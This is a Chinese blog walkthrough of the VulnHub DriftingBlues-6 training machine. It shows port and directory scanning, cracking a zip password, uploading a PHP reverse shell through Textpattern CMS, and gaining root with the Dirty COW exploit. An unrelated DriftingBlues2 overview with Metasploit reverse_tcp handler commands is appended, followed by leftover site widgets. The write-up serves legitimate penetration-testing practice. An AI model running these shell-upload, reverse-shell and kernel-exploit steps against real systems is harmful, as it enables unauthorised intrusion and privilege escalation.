靶机渗透练习Vulnhub DriftingBlues-6

攻击机ip

192.168.159.88

扫描主机

arp-scan -I eth0 -l

 得到靶机ip:

192.168.159.144  

扫描端口

nmap -sS -A -sV -T4 -p- 192.168.159.144  

 访问网页

192.168.159.144  

 没发现什么有用的信息

目录扫描

 使用dirb发现了robots.txt和/textpattern/textpattern

dirb 192.168.159.144  

扫描网站的后台 发现了robots.txt ,访问

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)

发现禁止爬取,然后根据提示访问 /textpattern/textpattern 发现了登入后台

进入后台,访问

http://192.168.159.144/textpattern/textpattern/

但是我们没有账号和密码

使用工具gobuster寻找后缀为zip的目录

安装工具gobuster

apt-get install gobuster

安装seclists字典:

apt-get install seclists

扫描目录

gobuster dir -u “192.168.159.144” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak

指纹识别出是Textpattern CMS

robots.txt中还有提示不要忘了zip,看到扫描结果中有 /spammer.zip,下载得到一个压缩包,尝试打开发现有密码

gobuster dir -u http://192.168.159.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

 访问

http://192.168.159.144/spammer.zip

得到一个有密码的zip文件

使用kali破解zip压缩包密码

 1.使用zip2john爆破得到zip密码

zip2john spammer.zip > password.txt

2.使用john破解

john password.txt

 得到密码

myspace4

解压zip文件

得到了一个用户名和密码

mayer:lionheart

用这个用户名和密码登入之前的网址

http://192.168.159.144/textpattern/textpattern/

进去后看到cms的版本是4.8.3

 思路一:kali本地搜索漏洞

searchsploit textpattern 4.8.3 

 查看49620.py详细信息与使用方法

searchsploit -x php/webapps/49620.py

python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d

输入命令

因为回看脚本,他会自己给你加一个testpattern,所以url参数就不用加那么多textpattern了

python3 48943.py http://192.168.159.144/textpattern mayer lionheart 

发现还是报错,用不了

思路二:寻找网站内的漏洞

在content那发现存在文件上传

在该处上传kali上的/usr/share/webshells/php/php-reverse-shell.php,上传前需要修ip和port 分别为攻击机ip和攻击机监听的tcp端口。

cd /usr/share/webshells/php

修改php

上传shell

 监听1234端口

nc -nlvp 1234

上传webshell

我们在admin管理界面可以看到上传地址 

访问

http://192.168.159.144/textpattern/files

 点击php-reverse-shell.php

回到kali已经监听成功

获得交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

脏牛提权

查看linux的版本信息

uname -a

内核版本>= 2.6.22 , 尝试脏牛提权

在github上下载提权脚本

https://github.com/FireFart/dirtycow

然后通过网站的文件上传漏洞解压后上传至后台

进入上传文件的文件夹

cd  /var/www/textpattern/files

进行编译,生成一个dirty的可执行文件

gcc -pthread dirty.c -o dirty -lcrypt

执行文件

./dirty

然后会让我们输入一个密码

 然后我们可以用用户名:firefart 密码:root

进入一个有root权限的用户

切换用户

su firefart

进入/root

cd /root

 得到flag.txt

参考文章

http://t.csdn.cn/nvjQG
http://t.csdn.cn/Jp7Ku
https://github.com/FireFart/dirtycow

### 关于VulnHub DriftingBlues2靶机详情 #### 靶机概述 DriftingBlues系列是VulnHub平台上提供给安全爱好者练习渗透测试技能的一组虚拟机镜像。这些靶机设计用于帮助用户提升其在网络攻防方面的能力,特别是针对Web应用的安全评估技巧。 对于特定的`DriftingBlues: 2`版本而言,此靶机旨在模拟真实世界中的信息系统环境,并设置了多个层次的任务来挑战玩家的技术水平[^4]。 #### 渗透测试流程 ##### 信息收集阶段 在这个过程中,首要任务是从外部视角了解目标系统的开放服务及其配置情况。通常采用的方法包括但不限于: - **主机发现**:通过网络扫描工具(如Nmap)识别活动主机并确定其IP地址范围。 - **端口和服务枚举**:进一步探测已知存活节点上的可用端口以及运行的服务类型和版本号。 由于`DriftingBlues: 2`的具体内部结构未完全公开,在实际操作前需自行探索更多细节以制定后续行动计划。 ##### 漏洞利用实践 一旦完成了初步的情报搜集工作,则可以根据所获数据选择合适的攻击向量实施入侵行为。例如,如果发现了某个存在已知漏洞的应用程序实例,则可考虑运用Metasploit Framework (MSF) 或其他自动化平台来进行针对性打击。 值得注意的是,在处理此类实验性质较强的项目时,建议遵循官方指南或社区分享的经验贴作为参考依据,以便更高效地完成整个过程[^5]。 ```bash # 使用Nmap进行基本的TCP SYN扫描 nmap -sS <target_ip> # 利用Metasploit加载exploit模块 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST <your_local_IP> run ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值